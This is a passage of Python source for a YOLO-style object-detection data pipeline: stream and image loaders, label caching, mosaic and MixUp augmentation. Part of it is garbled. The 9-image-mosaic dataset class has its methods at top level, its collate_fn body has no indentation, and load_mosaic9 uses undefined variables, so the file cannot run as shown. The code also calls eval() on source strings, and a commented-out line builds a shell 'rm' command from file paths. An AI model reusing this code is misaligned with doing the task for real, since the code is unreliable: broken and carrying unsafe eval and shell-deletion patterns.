    One daemon thread per source keeps self.imgs[i] refreshed with the
    latest frame; __next__ snapshots and letterboxes all of them.
    """

    def __init__(self, sources='streams.txt', img_size=640):
        self.mode = 'images'
        self.img_size = img_size

        # sources: a file with one URL per line, or a single source string
        if os.path.isfile(sources):
            with open(sources, 'r') as f:
                sources = [x.strip() for x in f.read().splitlines() if len(x.strip())]
        else:
            sources = [sources]

        n = len(sources)
        self.imgs = [None] * n
        self.sources = sources
        for i, s in enumerate(sources):
            # Start the thread to read frames from the video stream
            print('%g/%g: %s... ' % (i + 1, n, s), end='')
            # NOTE(review): eval() on numeric source strings; int(s) would be safer.
            cap = cv2.VideoCapture(eval(s) if s.isnumeric() else s)
            assert cap.isOpened(), 'Failed to open %s' % s
            w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
            h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
            fps = cap.get(cv2.CAP_PROP_FPS) % 100
            _, self.imgs[i] = cap.read()  # guarantee first frame
            thread = Thread(target=self.update, args=([i, cap]), daemon=True)
            print(' success (%gx%g at %.2f FPS).' % (w, h, fps))
            thread.start()
        print('')  # newline

        # check for common shapes
        s = np.stack([letterbox(x, new_shape=self.img_size)[0].shape for x in self.imgs], 0)  # inference shapes
        self.rect = np.unique(s, axis=0).shape[0] == 1  # rect inference if all shapes equal
        if not self.rect:
            print('WARNING: Different stream shapes detected. For optimal performance supply similarly-shaped streams.')

    def update(self, index, cap):
        # Read next stream frame in a daemon thread
        n = 0
        while cap.isOpened():
            n += 1
            # _, self.imgs[index] = cap.read()
            cap.grab()
            if n == 4:  # read every 4th frame
                _, self.imgs[index] = cap.retrieve()
                n = 0
            time.sleep(0.01)  # wait time

    def __iter__(self):
        self.count = -1
        return self

    def __next__(self):
        """Return (sources, stacked letterboxed RGB batch, raw frames, None)."""
        self.count += 1
        img0 = self.imgs.copy()
        if cv2.waitKey(1) == ord('q'):  # q to quit
            cv2.destroyAllWindows()
            raise StopIteration

        # Letterbox
        img = [letterbox(x, new_shape=self.img_size, auto=self.rect)[0] for x in img0]

        # Stack
        img = np.stack(img, 0)

        # Convert
        img = img[:, :, :, ::-1].transpose(0, 3, 1, 2)  # BGR to RGB, to bsx3x416x416
        img = np.ascontiguousarray(img)

        return self.sources, img, img0, None

    def __len__(self):
        return 0  # 1E12 frames = 32 streams at 30 FPS for 30 years
class LoadImagesAndLabels(Dataset):  # for training/testing
    """YOLO training/eval dataset: images plus normalized xywh label files.

    Labels live in a 'labels/' tree parallel to 'images/'; each per-image
    label array has rows [class, x, y, w, h], coordinates normalized 0-1.
    Uses a 4-image mosaic during augmented training.
    """

    def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
                 cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
        """Scan (or load cached) image/label lists and precompute batch shapes."""
        self.img_size = img_size
        self.augment = augment
        self.hyp = hyp  # augmentation hyperparameters dict
        self.image_weights = image_weights
        self.rect = False if image_weights else rect
        self.mosaic = self.augment and not self.rect  # load 4 images at a time into a mosaic (only during training)
        self.mosaic_border = [-img_size // 2, -img_size // 2]
        self.stride = stride

        def img2label_paths(img_paths):
            # Define label paths as a function of image paths
            sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep  # /images/, /labels/ substrings
            return [x.replace(sa, sb, 1).replace(x.split('.')[-1], 'txt') for x in img_paths]

        try:
            f = []  # image files
            for p in path if isinstance(path, list) else [path]:
                p = Path(p)  # os-agnostic
                if p.is_dir():  # dir
                    f += glob.glob(str(p / '**' / '*.*'), recursive=True)
                elif p.is_file():  # file
                    with open(p, 'r') as t:
                        t = t.read().splitlines()
                        parent = str(p.parent) + os.sep
                        f += [x.replace('./', parent) if x.startswith('./') else x for x in t]  # local to global path
                else:
                    raise Exception('%s does not exist' % p)
            self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
            assert self.img_files, 'No images found'
        except Exception as e:
            raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))

        # Check cache
        self.label_files = img2label_paths(self.img_files)  # labels
        cache_path = str(Path(self.label_files[0]).parent) + '.cache3'  # cached labels
        if os.path.isfile(cache_path):
            cache = torch.load(cache_path)  # load
            if cache['hash'] != get_hash(self.label_files + self.img_files):  # dataset changed
                cache = self.cache_labels(cache_path)  # re-cache
        else:
            cache = self.cache_labels(cache_path)  # cache

        # Read cache
        cache.pop('hash')  # remove hash
        labels, shapes = zip(*cache.values())
        self.labels = list(labels)
        self.shapes = np.array(shapes, dtype=np.float64)
        self.img_files = list(cache.keys())  # update
        self.label_files = img2label_paths(cache.keys())  # update

        n = len(shapes)  # number of images
        bi = np.floor(np.arange(n) / batch_size).astype(np.int)  # batch index
        nb = bi[-1] + 1  # number of batches
        self.batch = bi  # batch index of image
        self.n = n

        # Rectangular Training
        if self.rect:
            # Sort by aspect ratio
            s = self.shapes  # wh
            ar = s[:, 1] / s[:, 0]  # aspect ratio
            irect = ar.argsort()
            self.img_files = [self.img_files[i] for i in irect]
            self.label_files = [self.label_files[i] for i in irect]
            self.labels = [self.labels[i] for i in irect]
            self.shapes = s[irect]  # wh
            ar = ar[irect]

            # Set training image shapes
            shapes = [[1, 1]] * nb
            for i in range(nb):
                ari = ar[bi == i]
                mini, maxi = ari.min(), ari.max()
                if maxi < 1:
                    shapes[i] = [maxi, 1]
                elif mini > 1:
                    shapes[i] = [1, 1 / mini]

            self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride

        # Check labels
        create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
        nm, nf, ne, ns, nd = 0, 0, 0, 0, 0  # number missing, found, empty, datasubset, duplicate
        pbar = enumerate(self.label_files)
        if rank in [-1, 0]:
            pbar = tqdm(pbar)
        for i, file in pbar:
            l = self.labels[i]  # label
            if l is not None and l.shape[0]:
                assert l.shape[1] == 5, '> 5 label columns: %s' % file
                assert (l >= 0).all(), 'negative labels: %s' % file
                assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
                if np.unique(l, axis=0).shape[0] < l.shape[0]:  # duplicate rows
                    nd += 1  # print('WARNING: duplicate rows in %s' % self.label_files[i])  # duplicate rows
                if single_cls:
                    l[:, 0] = 0  # force dataset into single-class mode
                self.labels[i] = l
                nf += 1  # file found

                # Create subdataset (a smaller dataset)
                if create_datasubset and ns < 1E4:
                    if ns == 0:
                        create_folder(path='./datasubset')
                        os.makedirs('./datasubset/images')
                    exclude_classes = 43
                    if exclude_classes not in l[:, 0]:
                        ns += 1
                        # shutil.copy(src=self.img_files[i], dst='./datasubset/images/')  # copy image
                        with open('./datasubset/images.txt', 'a') as f:
                            f.write(self.img_files[i] + '\n')

                # Extract object detection boxes for a second stage classifier
                if extract_bounding_boxes:
                    p = Path(self.img_files[i])
                    img = cv2.imread(str(p))
                    h, w = img.shape[:2]
                    for j, x in enumerate(l):
                        f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
                        if not os.path.exists(Path(f).parent):
                            os.makedirs(Path(f).parent)  # make new output folder

                        b = x[1:] * [w, h, w, h]  # box
                        b[2:] = b[2:].max()  # rectangle to square
                        b[2:] = b[2:] * 1.3 + 30  # pad
                        b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)

                        b[[0, 2]] = np.clip(b[[0, 2]], 0, w)  # clip boxes outside of image
                        b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
                        assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
            else:
                ne += 1  # print('empty labels for image %s' % self.img_files[i])  # file empty
                # os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i]))  # remove

            if rank in [-1, 0]:
                pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
                    cache_path, nf, nm, ne, nd, n)
        if nf == 0:
            s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
            print(s)
            assert not augment, '%s. Can not train without labels.' % s

        # Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
        self.imgs = [None] * n
        if cache_images:
            gb = 0  # Gigabytes of cached images
            self.img_hw0, self.img_hw = [None] * n, [None] * n
            results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))  # 8 threads
            pbar = tqdm(enumerate(results), total=n)
            for i, x in pbar:
                self.imgs[i], self.img_hw0[i], self.img_hw[i] = x  # img, hw_original, hw_resized = load_image(self, i)
                gb += self.imgs[i].nbytes
                pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)

    def cache_labels(self, path='labels.cache3'):
        """Scan image/label pairs, validate them, and save the cache with a dataset hash."""
        # Cache dataset labels, check images and read shapes
        x = {}  # dict
        pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
        for (img, label) in pbar:
            try:
                l = []
                im = Image.open(img)
                im.verify()  # PIL verify
                shape = exif_size(im)  # image size
                assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
                if os.path.isfile(label):
                    with open(label, 'r') as f:
                        l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)  # labels
                if len(l) == 0:
                    l = np.zeros((0, 5), dtype=np.float32)
                x[img] = [l, shape]
            except Exception as e:
                print('WARNING: Ignoring corrupted image and/or label %s: %s' % (img, e))

        x['hash'] = get_hash(self.label_files + self.img_files)
        torch.save(x, path)  # save for next time
        return x

    def __len__(self):
        return len(self.img_files)

    # def __iter__(self):
    #     self.count = -1
    #     print('ran dataset iter')
    #     #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
    #     return self

    def __getitem__(self, index):
        """Return (image tensor RGB CHW, labels [n,6], image path, shapes) for one sample."""
        if self.image_weights:
            index = self.indices[index]

        hyp = self.hyp
        mosaic = self.mosaic and random.random() < hyp['mosaic']
        if mosaic:
            # Load mosaic
            img, labels = load_mosaic(self, index)
            #img, labels = load_mosaic9(self, index)
            shapes = None

            # MixUp https://arxiv.org/pdf/1710.09412.pdf
            if random.random() < hyp['mixup']:
                img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
                #img2, labels2 = load_mosaic9(self, random.randint(0, len(self.labels) - 1))
                r = np.random.beta(8.0, 8.0)  # mixup ratio, alpha=beta=8.0
                img = (img * r + img2 * (1 - r)).astype(np.uint8)
                labels = np.concatenate((labels, labels2), 0)

        else:
            # Load image
            img, (h0, w0), (h, w) = load_image(self, index)

            # Letterbox
            shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size  # final letterboxed shape
            img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
            shapes = (h0, w0), ((h / h0, w / w0), pad)  # for COCO mAP rescaling

            # Load labels
            labels = []
            x = self.labels[index]
            if x.size > 0:
                # Normalized xywh to pixel xyxy format
                labels = x.copy()
                labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0]  # pad width
                labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1]  # pad height
                labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
                labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]

        if self.augment:
            # Augment imagespace
            if not mosaic:
                img, labels = random_perspective(img, labels,
                                                 degrees=hyp['degrees'],
                                                 translate=hyp['translate'],
                                                 scale=hyp['scale'],
                                                 shear=hyp['shear'],
                                                 perspective=hyp['perspective'])

            # Augment colorspace
            augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])

            # Apply cutouts
            # if random.random() < 0.9:
            #     labels = cutout(img, labels)

        nL = len(labels)  # number of labels
        if nL:
            labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])  # convert xyxy to xywh
            labels[:, [2, 4]] /= img.shape[0]  # normalized height 0-1
            labels[:, [1, 3]] /= img.shape[1]  # normalized width 0-1

        if self.augment:
            # flip up-down
            if random.random() < hyp['flipud']:
                img = np.flipud(img)
                if nL:
                    labels[:, 2] = 1 - labels[:, 2]

            # flip left-right
            if random.random() < hyp['fliplr']:
                img = np.fliplr(img)
                if nL:
                    labels[:, 1] = 1 - labels[:, 1]

        labels_out = torch.zeros((nL, 6))
        if nL:
            labels_out[:, 1:] = torch.from_numpy(labels)

        # Convert
        img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
        img = np.ascontiguousarray(img)

        return torch.from_numpy(img), labels_out, self.img_files[index], shapes

    @staticmethod
    def collate_fn(batch):
        """Stack images; concatenate labels, tagging each row with its batch index."""
        img, label, path, shapes = zip(*batch)  # transposed
        for i, l in enumerate(label):
            l[:, 0] = i  # add target image index for build_targets()
        return torch.stack(img, 0), torch.cat(label, 0), path, shapes
class LoadImagesAndLabels9(Dataset): # for training/testing
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
             cache_images=False, single_cls=False, stride=32, pad=0.0, rank=-1):
    """Scan (or load cached) image/label lists; mirrors LoadImagesAndLabels.__init__
    for the 9-image-mosaic variant of the dataset."""
    self.img_size = img_size
    self.augment = augment
    self.hyp = hyp  # augmentation hyperparameters dict
    self.image_weights = image_weights
    self.rect = False if image_weights else rect
    self.mosaic = self.augment and not self.rect  # load 4 images at a time into a mosaic (only during training)
    self.mosaic_border = [-img_size // 2, -img_size // 2]
    self.stride = stride

    def img2label_paths(img_paths):
        # Define label paths as a function of image paths
        sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep  # /images/, /labels/ substrings
        return [x.replace(sa, sb, 1).replace(x.split('.')[-1], 'txt') for x in img_paths]

    try:
        f = []  # image files
        for p in path if isinstance(path, list) else [path]:
            p = Path(p)  # os-agnostic
            if p.is_dir():  # dir
                f += glob.glob(str(p / '**' / '*.*'), recursive=True)
            elif p.is_file():  # file
                with open(p, 'r') as t:
                    t = t.read().splitlines()
                    parent = str(p.parent) + os.sep
                    f += [x.replace('./', parent) if x.startswith('./') else x for x in t]  # local to global path
            else:
                raise Exception('%s does not exist' % p)
        self.img_files = sorted([x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in img_formats])
        assert self.img_files, 'No images found'
    except Exception as e:
        raise Exception('Error loading data from %s: %s\nSee %s' % (path, e, help_url))

    # Check cache
    self.label_files = img2label_paths(self.img_files)  # labels
    cache_path = str(Path(self.label_files[0]).parent) + '.cache3'  # cached labels
    if os.path.isfile(cache_path):
        cache = torch.load(cache_path)  # load
        if cache['hash'] != get_hash(self.label_files + self.img_files):  # dataset changed
            cache = self.cache_labels(cache_path)  # re-cache
    else:
        cache = self.cache_labels(cache_path)  # cache

    # Read cache
    cache.pop('hash')  # remove hash
    labels, shapes = zip(*cache.values())
    self.labels = list(labels)
    self.shapes = np.array(shapes, dtype=np.float64)
    self.img_files = list(cache.keys())  # update
    self.label_files = img2label_paths(cache.keys())  # update

    n = len(shapes)  # number of images
    bi = np.floor(np.arange(n) / batch_size).astype(np.int)  # batch index
    nb = bi[-1] + 1  # number of batches
    self.batch = bi  # batch index of image
    self.n = n

    # Rectangular Training
    if self.rect:
        # Sort by aspect ratio
        s = self.shapes  # wh
        ar = s[:, 1] / s[:, 0]  # aspect ratio
        irect = ar.argsort()
        self.img_files = [self.img_files[i] for i in irect]
        self.label_files = [self.label_files[i] for i in irect]
        self.labels = [self.labels[i] for i in irect]
        self.shapes = s[irect]  # wh
        ar = ar[irect]

        # Set training image shapes
        shapes = [[1, 1]] * nb
        for i in range(nb):
            ari = ar[bi == i]
            mini, maxi = ari.min(), ari.max()
            if maxi < 1:
                shapes[i] = [maxi, 1]
            elif mini > 1:
                shapes[i] = [1, 1 / mini]

        self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride

    # Check labels
    create_datasubset, extract_bounding_boxes, labels_loaded = False, False, False
    nm, nf, ne, ns, nd = 0, 0, 0, 0, 0  # number missing, found, empty, datasubset, duplicate
    pbar = enumerate(self.label_files)
    if rank in [-1, 0]:
        pbar = tqdm(pbar)
    for i, file in pbar:
        l = self.labels[i]  # label
        if l is not None and l.shape[0]:
            assert l.shape[1] == 5, '> 5 label columns: %s' % file
            assert (l >= 0).all(), 'negative labels: %s' % file
            assert (l[:, 1:] <= 1).all(), 'non-normalized or out of bounds coordinate labels: %s' % file
            if np.unique(l, axis=0).shape[0] < l.shape[0]:  # duplicate rows
                nd += 1  # print('WARNING: duplicate rows in %s' % self.label_files[i])  # duplicate rows
            if single_cls:
                l[:, 0] = 0  # force dataset into single-class mode
            self.labels[i] = l
            nf += 1  # file found

            # Create subdataset (a smaller dataset)
            if create_datasubset and ns < 1E4:
                if ns == 0:
                    create_folder(path='./datasubset')
                    os.makedirs('./datasubset/images')
                exclude_classes = 43
                if exclude_classes not in l[:, 0]:
                    ns += 1
                    # shutil.copy(src=self.img_files[i], dst='./datasubset/images/')  # copy image
                    with open('./datasubset/images.txt', 'a') as f:
                        f.write(self.img_files[i] + '\n')

            # Extract object detection boxes for a second stage classifier
            if extract_bounding_boxes:
                p = Path(self.img_files[i])
                img = cv2.imread(str(p))
                h, w = img.shape[:2]
                for j, x in enumerate(l):
                    f = '%s%sclassifier%s%g_%g_%s' % (p.parent.parent, os.sep, os.sep, x[0], j, p.name)
                    if not os.path.exists(Path(f).parent):
                        os.makedirs(Path(f).parent)  # make new output folder

                    b = x[1:] * [w, h, w, h]  # box
                    b[2:] = b[2:].max()  # rectangle to square
                    b[2:] = b[2:] * 1.3 + 30  # pad
                    b = xywh2xyxy(b.reshape(-1, 4)).ravel().astype(np.int)

                    b[[0, 2]] = np.clip(b[[0, 2]], 0, w)  # clip boxes outside of image
                    b[[1, 3]] = np.clip(b[[1, 3]], 0, h)
                    assert cv2.imwrite(f, img[b[1]:b[3], b[0]:b[2]]), 'Failure extracting classifier boxes'
        else:
            ne += 1  # print('empty labels for image %s' % self.img_files[i])  # file empty
            # os.system("rm '%s' '%s'" % (self.img_files[i], self.label_files[i]))  # remove

        if rank in [-1, 0]:
            pbar.desc = 'Scanning labels %s (%g found, %g missing, %g empty, %g duplicate, for %g images)' % (
                cache_path, nf, nm, ne, nd, n)
    if nf == 0:
        s = 'WARNING: No labels found in %s. See %s' % (os.path.dirname(file) + os.sep, help_url)
        print(s)
        assert not augment, '%s. Can not train without labels.' % s

    # Cache images into memory for faster training (WARNING: large datasets may exceed system RAM)
    self.imgs = [None] * n
    if cache_images:
        gb = 0  # Gigabytes of cached images
        self.img_hw0, self.img_hw = [None] * n, [None] * n
        results = ThreadPool(8).imap(lambda x: load_image(*x), zip(repeat(self), range(n)))  # 8 threads
        pbar = tqdm(enumerate(results), total=n)
        for i, x in pbar:
            self.imgs[i], self.img_hw0[i], self.img_hw[i] = x  # img, hw_original, hw_resized = load_image(self, i)
            gb += self.imgs[i].nbytes
            pbar.desc = 'Caching images (%.1fGB)' % (gb / 1E9)
def cache_labels(self, path='labels.cache3'):
    """Scan the dataset once: verify every image, record its size, and parse
    its label file into an (n, 5) float32 array of [class, x, y, w, h] rows.

    Returns the cache dict mapping image path -> [labels, shape] (shape from
    exif_size — presumably (width, height); confirm against exif_size), plus a
    'hash' entry used to detect stale caches.  The dict is also written to
    *path* with torch.save so the next run can skip the scan.
    """
    x = {}  # cache dict: image path -> [label array, image shape]
    pbar = tqdm(zip(self.img_files, self.label_files), desc='Scanning images', total=len(self.img_files))
    for (img, label) in pbar:
        try:
            l = []
            im = Image.open(img)
            im.verify()  # PIL verify: detects truncated/corrupt files without a full decode
            shape = exif_size(im)  # image size (EXIF-orientation aware)
            assert (shape[0] > 9) & (shape[1] > 9), 'image size <10 pixels'
            if os.path.isfile(label):
                with open(label, 'r') as f:
                    # one whitespace-separated row per object; note the comprehension's
                    # `x` shadows the cache dict only inside the comprehension scope
                    l = np.array([x.split() for x in f.read().splitlines()], dtype=np.float32)  # labels
            if len(l) == 0:
                # no label file (or an empty one): store an empty (0, 5) array
                l = np.zeros((0, 5), dtype=np.float32)
            x[img] = [l, shape]
        except Exception as e:
            # best-effort scan: a corrupted image/label pair is skipped, not fatal
            print('WARNING: Ignoring corrupted image and/or label %s: %s' % (img, e))

    x['hash'] = get_hash(self.label_files + self.img_files)  # fingerprint to invalidate stale caches
    torch.save(x, path)  # save for next time
    return x
def __len__(self):
    """Dataset length: one sample per image file."""
    n_images = len(self.img_files)
    return n_images
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
    """Return one training sample: (image tensor CxHxW RGB, labels (n, 6),
    image path, letterbox shapes-or-None).

    Labels rows are [batch_index placeholder, class, x, y, w, h] with xywh
    normalized to 0-1.  When mosaic augmentation fires, `shapes` is None;
    otherwise it carries the letterbox geometry for COCO mAP rescaling.
    """
    if self.image_weights:
        # remap through the (weighted-sampling) index table
        index = self.indices[index]

    hyp = self.hyp
    mosaic = self.mosaic and random.random() < hyp['mosaic']
    if mosaic:
        # Load mosaic
        #img, labels = load_mosaic(self, index)
        img, labels = load_mosaic9(self, index)
        shapes = None

        # MixUp https://arxiv.org/pdf/1710.09412.pdf
        if random.random() < hyp['mixup']:
            #img2, labels2 = load_mosaic(self, random.randint(0, len(self.labels) - 1))
            img2, labels2 = load_mosaic9(self, random.randint(0, len(self.labels) - 1))
            r = np.random.beta(8.0, 8.0)  # mixup ratio, alpha=beta=8.0
            img = (img * r + img2 * (1 - r)).astype(np.uint8)
            labels = np.concatenate((labels, labels2), 0)
    else:
        # Load image
        img, (h0, w0), (h, w) = load_image(self, index)

        # Letterbox
        shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size  # final letterboxed shape
        img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
        shapes = (h0, w0), ((h / h0, w / w0), pad)  # for COCO mAP rescaling

        # Load labels
        labels = []
        x = self.labels[index]
        if x.size > 0:
            # Normalized xywh to pixel xyxy format (in letterboxed coordinates)
            labels = x.copy()
            labels[:, 1] = ratio[0] * w * (x[:, 1] - x[:, 3] / 2) + pad[0]  # pad width
            labels[:, 2] = ratio[1] * h * (x[:, 2] - x[:, 4] / 2) + pad[1]  # pad height
            labels[:, 3] = ratio[0] * w * (x[:, 1] + x[:, 3] / 2) + pad[0]
            labels[:, 4] = ratio[1] * h * (x[:, 2] + x[:, 4] / 2) + pad[1]

    if self.augment:
        # Augment imagespace (mosaic already applied random_perspective internally)
        if not mosaic:
            img, labels = random_perspective(img, labels,
                                             degrees=hyp['degrees'],
                                             translate=hyp['translate'],
                                             scale=hyp['scale'],
                                             shear=hyp['shear'],
                                             perspective=hyp['perspective'])

        # Augment colorspace
        augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])

        # Apply cutouts
        # if random.random() < 0.9:
        #     labels = cutout(img, labels)

    nL = len(labels)  # number of labels
    if nL:
        labels[:, 1:5] = xyxy2xywh(labels[:, 1:5])  # convert xyxy to xywh
        labels[:, [2, 4]] /= img.shape[0]  # normalized height 0-1
        labels[:, [1, 3]] /= img.shape[1]  # normalized width 0-1

    if self.augment:
        # flip up-down
        if random.random() < hyp['flipud']:
            img = np.flipud(img)
            if nL:
                labels[:, 2] = 1 - labels[:, 2]

        # flip left-right
        if random.random() < hyp['fliplr']:
            img = np.fliplr(img)
            if nL:
                labels[:, 1] = 1 - labels[:, 1]

    # column 0 is left zero here; collate_fn fills in the batch image index
    labels_out = torch.zeros((nL, 6))
    if nL:
        labels_out[:, 1:] = torch.from_numpy(labels)

    # Convert
    img = img[:, :, ::-1].transpose(2, 0, 1)  # BGR to RGB, to 3x416x416
    img = np.ascontiguousarray(img)

    return torch.from_numpy(img), labels_out, self.img_files[index], shapes
@staticmethod
def collate_fn(batch):
img, label, path, shapes = zip(*batch) # transposed
for i, l in enumerate(label):
l[:, 0] = i # add target image index for build_targets()
return torch.stack(img, 0), torch.cat(label, 0), path, shapes
# Ancillary functions --------------------------------------------------------------------------------------------------
def load_image(self, index):
    """Load one dataset image; return (img, (h0, w0), (h, w)) — the BGR array,
    the original height/width, and the height/width after resizing."""
    cached = self.imgs[index]
    if cached is not None:
        # image was pre-cached in memory by the dataset constructor
        return cached, self.img_hw0[index], self.img_hw[index]

    path = self.img_files[index]
    img = cv2.imread(path)  # BGR
    assert img is not None, 'Image Not Found ' + path
    h0, w0 = img.shape[:2]  # original height, width
    r = self.img_size / max(h0, w0)  # scale factor bringing the long side to img_size
    if r != 1:  # always resize down, only resize up if training with augmentation
        shrink_without_augment = r < 1 and not self.augment
        interp = cv2.INTER_AREA if shrink_without_augment else cv2.INTER_LINEAR
        img = cv2.resize(img, (int(w0 * r), int(h0 * r)), interpolation=interp)
    return img, (h0, w0), img.shape[:2]  # img, hw_original, hw_resized
def augment_hsv(img, hgain=0.5, sgain=0.5, vgain=0.5):
    """Randomly jitter hue/saturation/value of a BGR uint8 image, in place."""
    gains = np.random.uniform(-1, 1, 3) * [hgain, sgain, vgain] + 1  # random gains around 1
    hue, sat, val = cv2.split(cv2.cvtColor(img, cv2.COLOR_BGR2HSV))
    dtype = img.dtype  # uint8

    # build one 256-entry lookup table per channel rather than scaling pixels directly
    base = np.arange(0, 256, dtype=np.int16)
    lut_hue = ((base * gains[0]) % 180).astype(dtype)  # OpenCV 8-bit hue wraps at 180
    lut_sat = np.clip(base * gains[1], 0, 255).astype(dtype)
    lut_val = np.clip(base * gains[2], 0, 255).astype(dtype)

    remapped = (cv2.LUT(hue, lut_hue), cv2.LUT(sat, lut_sat), cv2.LUT(val, lut_val))
    img_hsv = cv2.merge(remapped).astype(dtype)
    cv2.cvtColor(img_hsv, cv2.COLOR_HSV2BGR, dst=img)  # write back in place; no return needed
def load_mosaic(self, index):
    """Build a 2x2 mosaic: the indexed image plus 3 random images pasted
    around a random centre in a (2s, 2s) canvas, labels shifted into mosaic
    pixel coordinates, then random_perspective applied.
    """
    labels4 = []
    s = self.img_size
    yc, xc = [int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border]  # mosaic center x, y
    indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(3)]  # 3 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img4: (a) = destination rect in mosaic, (b) = source rect in img
        if i == 0:  # top left
            img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc  # xmin, ymin, xmax, ymax (large image)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h  # xmin, ymin, xmax, ymax (small image)
        elif i == 1:  # top right
            x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
            x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
        elif i == 2:  # bottom left
            x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
        elif i == 3:  # bottom right
            x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
            x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)

        img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b]  # img4[ymin:ymax, xmin:xmax]
        padw = x1a - x1b  # x offset from image to mosaic coordinates
        padh = y1a - y1b  # y offset

        # Labels
        x = self.labels[index]
        labels = x.copy()
        if x.size > 0:  # Normalized xywh to pixel xyxy format (mosaic coordinates)
            labels[:, 1] = w * (x[:, 1] - x[:, 3] / 2) + padw
            labels[:, 2] = h * (x[:, 2] - x[:, 4] / 2) + padh
            labels[:, 3] = w * (x[:, 1] + x[:, 3] / 2) + padw
            labels[:, 4] = h * (x[:, 2] + x[:, 4] / 2) + padh
        labels4.append(labels)

    # Concat/clip labels
    if len(labels4):
        labels4 = np.concatenate(labels4, 0)
        np.clip(labels4[:, 1:], 0, 2 * s, out=labels4[:, 1:])  # use with random_perspective
        # img4, labels4 = replicate(img4, labels4)  # replicate

    # Augment
    img4, labels4 = random_perspective(img4, labels4,
                                       degrees=self.hyp['degrees'],
                                       translate=self.hyp['translate'],
                                       scale=self.hyp['scale'],
                                       shear=self.hyp['shear'],
                                       perspective=self.hyp['perspective'],
                                       border=self.mosaic_border)  # border to remove

    return img4, labels4
def load_mosaic9(self, index):
    """Build a 3x3 mosaic: the indexed image in the centre plus 8 random
    images tiled around it in a (3s, 3s) canvas, then a random (2s, 2s)
    crop and random_perspective.  Returns the mosaic image and its labels.
    """
    labels9 = []
    s = self.img_size
    indices = [index] + [random.randint(0, len(self.labels) - 1) for _ in range(8)]  # 8 additional image indices
    for i, index in enumerate(indices):
        # Load image
        img, _, (h, w) = load_image(self, index)

        # place img in img9: c = (xmin, ymin, xmax, ymax) of this tile in mosaic coords
        if i == 0:  # center
            img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 4 tiles
            h0, w0 = h, w  # centre tile size, reused when placing outer tiles
            c = s, s, s + w, s + h  # xmin, ymin, xmax, ymax (base) coordinates
        elif i == 1:  # top
            c = s, s - h, s + w, s
        elif i == 2:  # top right
            c = s + wp, s - h, s + wp + w, s
        elif i == 3:  # right
            c = s + w0, s, s + w0 + w, s + h
        elif i == 4:  # bottom right
            c = s + w0, s + hp, s + w0 + w, s + hp + h
